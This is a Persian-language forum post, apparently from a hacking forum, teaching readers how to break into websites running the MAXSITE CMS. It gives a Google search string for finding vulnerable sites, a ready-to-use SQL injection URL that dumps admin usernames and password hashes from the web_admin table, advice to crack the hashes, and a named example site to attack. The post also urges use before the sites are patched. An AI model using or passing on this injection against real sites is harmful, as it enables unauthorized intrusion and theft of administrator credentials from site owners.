:: دیکدر۳۵ با 45 پست
00989173832080 - 00989371809431 : شماره تماس
سلام دوستان!امروز براتون به آموزش جالب از سری آموزش های هک سایت به وسیله باگ های منتشر شده رو گذاشتم!
این آموزش از این قرار است که شما می توانید از طریق آسیپ پذیری موجو در سایت های که دارای مدیریت محتوای (CMS MAXSITE) هستند به هک پسورد ادمین این قبیل سایت ها بپردازید!
خوب شما برای هک این سایت ها ابتدا یکی از دو عبارت زیر را در گوگل جستجو کنید:
webboard&category
حال پس ار یافتن سایت های مورد نظر فقط کافی است که عبارت زیر را به ادامه نام سایت اضافه کنید:
index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*
حال مشاهده خواهید کرد که پسورد های ادمین سایت را به صورت Encode شده در اختیار شما قرار داده می شود و شما می توانید به وسیله یک برنامه Encode پسورد های اصلی را به دست آورید که در پائین یک سایت به عنوان مثال برای شما کاربران عزیز ذکر شده است!
مثال:
http://www.beeraya.com/
توجه:کلیه مطالب قرار گرفته شده در این آموزش به علت به روز رسانی سریع سایت ها در مقابل اکسپلویدها ی منتشر شده ،حد اکثر تا ۲۵ روز پس از تاریخ به روز رسانی این پست ،قابل استفاده می باشند!
با تشکر دیکدر۳۵
بالا